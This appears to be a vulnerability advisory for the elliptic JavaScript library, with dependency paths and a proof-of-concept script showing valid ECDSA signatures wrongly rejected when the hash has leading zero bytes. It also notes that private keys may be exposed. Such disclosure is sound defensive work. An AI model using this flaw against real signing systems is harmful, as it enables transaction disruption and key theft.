  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @ethersproject/wallet@5.8.0 @ethersproject/json-wallets@5.8.0 @ethersproject/hdnode@5.8.0 @ethersproject/wordlists@5.8.0 @ethersproject/hash@5.8.0 @ethersproject/abstract-signer@5.8.0 @ethersproject/abstract-provider@5.8.0 @ethersproject/transactions@5.8.0 @ethersproject/signing-key@5.8.0 elliptic@6.6.1
  • Introduced through: harmony-marketplace-sdk@blockcoders/harmony-marketplace-sdk#838591738a8e239e479264385b0851500c08ed3b @harmony-js/core@0.1.58 @harmony-js/contract@0.1.58 @harmony-js/account@0.1.58 @harmony-js/core@0.1.58 @harmony-js/staking@0.1.58 @harmony-js/transaction@0.1.58 @harmony-js/crypto@0.1.58 hdkey@1.1.2 secp256k1@3.8.1 elliptic@6.6.1

…and 96 more

Overview

elliptic is a fast elliptic-curve cryptography implementation in plain javascript.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to an anomaly in the _truncateToN function. An attacker can cause legitimate transactions or communications to be incorrectly flagged as invalid by exploiting the signature verification process when the hash contains at least four leading 0 bytes, and the order of the elliptic curve's base point is smaller than the hash. In some situations, a private key exposure is possible. This can happen when an attacker knows a faulty and the corresponding correct signature for the same message.

PoC

var elliptic = require('elliptic'); // tested with version 6.5.7
var hash = require('hash.js');
var BN = require('bn.js');
var toArray = elliptic.utils.toArray;

var ec = new elliptic.ec('p192');
var msg = '343236343739373234';
var sig = '303502186f20676c0d04fc40ea55d5702f798355787363a91e97a7e50219009d1c8c171b2b02e7d791c204c17cea4cf556a2034288885b';
// Same public key just in different formats
var pk = '04cd35a0b18eeb8fcd87ff019780012828745f046e785deba28150de1be6cb4376523006beff30ff09b4049125ced29723';
var pkPem = '-----BEGIN PUBLIC KEY-----\nMEkwEwYHKoZIzj0CAQYIKoZIzj0DAQEDMgAEzTWgsY7rj82H/wGXgAEoKHRfBG54\nXeuigVDeG+bLQ3ZSMAa+/zD/CbQEkSXO0pcj\n-----END PUBLIC KEY-----\n';

// Create hash
var hashArray = hash.sha256().update(toArray(msg, 'hex')).digest();
// Convert array to string (just for showcase of the leading zeros)
var hashStr = Array.from(hashArray, function(byte) {
  return ('0' + (byte & 0xFF).toString(16)).slice(-2);
}).join('');
var hMsg = new BN(hashArray, 'hex');
// Hashed message contains 4 leading zeros bytes
console.log('sha256 hash(str): ' + hashStr);
// Due to using BN bitLength lib it does not calculate the bit length correctly (should be 32 since it is a sha256 hash)
console.log('Byte len of sha256 hash: ' + hMsg.byteLength());
console.log('sha256 hash(BN): ' + hMsg.toString(16));

// Due to the shift of the message to be within the order of the curve the delta computation is invalid
var pubKey = ec.keyFromPublic(toArray(pk, 'hex'));
console.log('Valid signature: ' + pubKey.verify(hashStr, sig));

// You can check that this hash should validate by consolidating openssl
const fs = require('fs');
fs.writeFile('msg.bin', new BN(msg, 16).toBuffer(), (err) => {
  if (err) throw err;
});
fs.writeFile('sig.bin', new BN(sig, 16).toBuffer(), (err) => {
  if (err) throw err;
});
fs.writeFile('cert.pem', pkPem, (err) => {
  if (err) throw err;
});

// To verify the correctness of the message signature and key one can run:
// openssl dgst -sha256 -verify cert.pem -signature sig.bin msg.bin
// Or run this python script
/*
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec


msg = '343236343739373234'
sig = '303502186f20676c0d04fc40ea55d5702f798355787363a91e97a7e50219009d1c8c171b2b02e7d791c204c17cea4cf556a2034288885b'
pk = '04cd35a0b18eeb8fcd87ff019780012828745f046e785deba28150de1be6cb4376523006beff30ff09b4049125ced29723'

p192 = ec.SECP192R1()
pk = ec.EllipticCurvePublicKey.from_encoded_point(p192, bytes.fromhex(pk))
pk.verify(bytes.fromhex(sig), bytes.fromhex(msg), ec.ECDSA(hashes.SHA256()))
*/

Remediation

There is no fixed version for elliptic.

References

Improper Verification of Cryptographic Signature vulnerability report